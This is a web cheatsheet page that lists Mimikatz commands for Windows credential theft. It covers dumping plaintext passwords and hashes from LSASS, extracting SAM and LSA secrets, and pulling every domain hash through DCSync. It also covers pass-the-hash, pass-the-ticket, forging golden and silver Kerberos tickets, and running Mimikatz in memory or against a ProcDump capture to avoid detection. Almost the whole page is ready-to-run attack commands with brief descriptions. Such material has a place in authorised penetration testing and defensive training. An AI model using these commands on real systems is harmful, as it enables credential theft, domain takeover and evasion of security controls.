← All Cheatsheets
active-directory

Mimikatz — Windows Credential Dumping

Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.

15 views Apr 2026 lazyhackers
Core Commands (9)
privilege::debug
Get SeDebugPrivilege (required for most ops)
priv debug
token::elevate
Impersonate SYSTEM token
priv system
sekurlsa::logonpasswords
Dump plaintext passwords from LSASS memory
lsass creds plaintext
sekurlsa::wdigest
Dump WDigest credentials (older Windows)
wdigest creds
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
Pass-the-Hash — spawn cmd as user
pth pass-the-hash
sekurlsa::tickets
List Kerberos tickets in memory
kerberos tickets
sekurlsa::tickets /export
Export all Kerberos tickets to .kirbi files
kerberos tickets export
sekurlsa::ekeys
Dump Kerberos encryption keys (AES keys)
kerberos aes
sekurlsa::dpapi
Dump DPAPI credentials
dpapi creds
SAM & NTDS (6)
lsadump::sam
Dump SAM database local hashes
sam hashes
lsadump::lsa /patch
Dump LSA secrets
lsa secrets
lsadump::dcsync /domain:corp.local /user:Administrator
DCSync — pull hash of specific user
dcsync da
lsadump::dcsync /domain:corp.local /all /csv
DCSync — dump ALL domain hashes to CSV
dcsync all
lsadump::cache
Dump cached domain credentials (MSCache2)
cache creds
lsadump::secrets
Dump LSA secrets (service accounts, etc)
lsa secrets
Kerberos Ticket Attacks (5)
kerberos::list /export
List and export Kerberos tickets
kerberos tickets
kerberos::ptt ticket.kirbi
Pass-the-Ticket — inject .kirbi into session
ptt kerberos
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
Create Golden Ticket (offline)
golden-ticket kerberos
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
Create Silver Ticket for service
silver-ticket kerberos
kerberos::purge
Delete all Kerberos tickets from memory
kerberos cleanup
Remote & Evasion (4)
invoke-mimikatz -DumpCreds
PowerSploit Invoke-Mimikatz (in-memory, no disk)
powershell invoke evasion
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
Run Mimikatz non-interactively
cli noninteractive
procdump.exe -ma lsass.exe lsass.dmp
Dump LSASS process with ProcDump (then analyze offline)
lsass dump procdump
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Analyze offline LSASS dump
lsass minidump offline